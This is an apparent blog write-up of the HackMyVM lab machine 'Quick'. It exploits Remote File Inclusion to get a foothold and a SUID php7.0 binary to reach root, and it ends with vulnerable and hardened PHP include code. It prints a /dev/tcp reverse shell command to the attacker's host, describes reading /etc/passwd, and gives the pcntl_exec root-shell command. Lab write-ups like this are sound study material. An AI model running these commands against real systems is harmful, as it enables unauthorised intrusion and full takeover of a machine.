Hackmyvm QUICK

Vishal
4 min read · Apr 28, 2024

Let's try to solve the machine "Quick" from HackMyVM.

This is a simple machine: only port 80 is open, the initial foothold comes from exploiting a Remote File Inclusion (RFI), and privilege escalation uses a SUID binary.

I downloaded the machine and opened it in Oracle VirtualBox. To find the IP address of the box, I used the netdiscover utility on Kali Linux. The target IP for me is 192.168.0.142.

Find open ports: I used nmap to find the open ports and the services running on them.

The only open port is 80.

nmap showing only port 80 is open

Let’s try to find the web app running on port 80.

web app running on port 80

If you look at the address bar, the URL is http://IP?page=home, which suggests that it might be possible to exploit Local File Inclusion (LFI) or Remote File Inclusion (RFI).

I first tried to fuzz the directories on the web server, but it did not find any. Then I checked for LFI, but it seems the application is not vulnerable to LFI.

After LFI, I tried RFI. To test it, I started a simple HTTP server on my machine with the command "python3 -m http.server 9090" and tried to access its URL through the web app.

Possible RFI

The image above indicates that it is possible to include a remote file from the web app. To test this further, I created a simple PHP file that echoes some text back in the browser, which will show that PHP code is actually executed.

Contents of test.php file

Let's try to access this file and check whether we see the text "RFI exploit works". The web application included the remote PHP file and I saw that text in the browser.

Web App included the remote file.

Now I will host a PHP file that executes OS commands. Below is the content of that file.

Contents of shell.php file

I am able to read the contents of the /etc/passwd file using the RFI.

contents of /etc/passwd

Now I will create a bash file which, when executed, gives me a shell on the box. I download the file onto the target machine in the /tmp directory, change its permissions to make it executable, and then execute it.

sh -i >& /dev/tcp/192.168.0.135/9001 0>&1
Downloaded the file onto the victim in the /tmp directory
Contents of shell.sh on the victim machine, with its mode changed to executable

Now start a netcat listener on the Kali box on port 9001, use the RFI to execute the file above, and receive the reverse shell on the netcat listener.

Reverse shell on the box

Privilege escalation: to find a way to escalate privileges, I used linpeas. In the output of the SUID binaries section, it flagged php7.0 as "Unknown SUID binary!".

php7.0 as SUID binary

Let’s search GTFOBins for privilege escalation.

This shows that we can execute commands through php and get a shell. I used the command cd /usr/bin;php7.0 -r "pcntl_exec('/bin/bash',['-p']);" to get the root shell.

root shell

Now let's look at what RFI is:

Remote File Inclusion (RFI) is a type of vulnerability that lets an attacker make the web server include, and execute, code from a file hosted on a remote server the attacker controls.

RFI vulnerabilities typically occur when a web application dynamically includes files based on user-supplied input.

I think the code block below is what causes the RFI issue: it passes the value of page directly to include. It also appends .php to the end, which is why I was unable to read local files through it.

vulnerable code

If you check this link, you will see the security warning.
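To make the fix concrete, here is the include pattern the write-up describes next to a hardened version. This is an added example, not the box's own source; the page names and file paths are assumed.

```php
<?php
// Added example (not the box's own code): the include pattern the
// write-up describes, next to a hardened version.

// VULNERABLE: the raw ?page= value is concatenated into the include path.
// With allow_url_include=On, page=http://<remote host>/shell makes the
// server fetch and execute remote code; with it off, the appended ".php"
// still leaves local .php files reachable through "../" traversal.
function vulnerable_include(string $page): void
{
    include $page . '.php';
}

// HARDENED: map the parameter onto a fixed allow-list of page files and
// refuse anything else, so no user-controlled bytes reach include().
// The page names and paths here are assumed for illustration.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function safe_include(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    // Path is built only from constants, never from the request.
    include __DIR__ . '/' . PAGES[$page];
}

safe_include($_GET['page'] ?? 'home');
```

As defence in depth, also set allow_url_include=Off in php.ini so include() cannot fetch URLs at all, regardless of what the application code does.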

So that's the box. I hope you enjoyed reading the post and liked it.

See you soon with a new box…
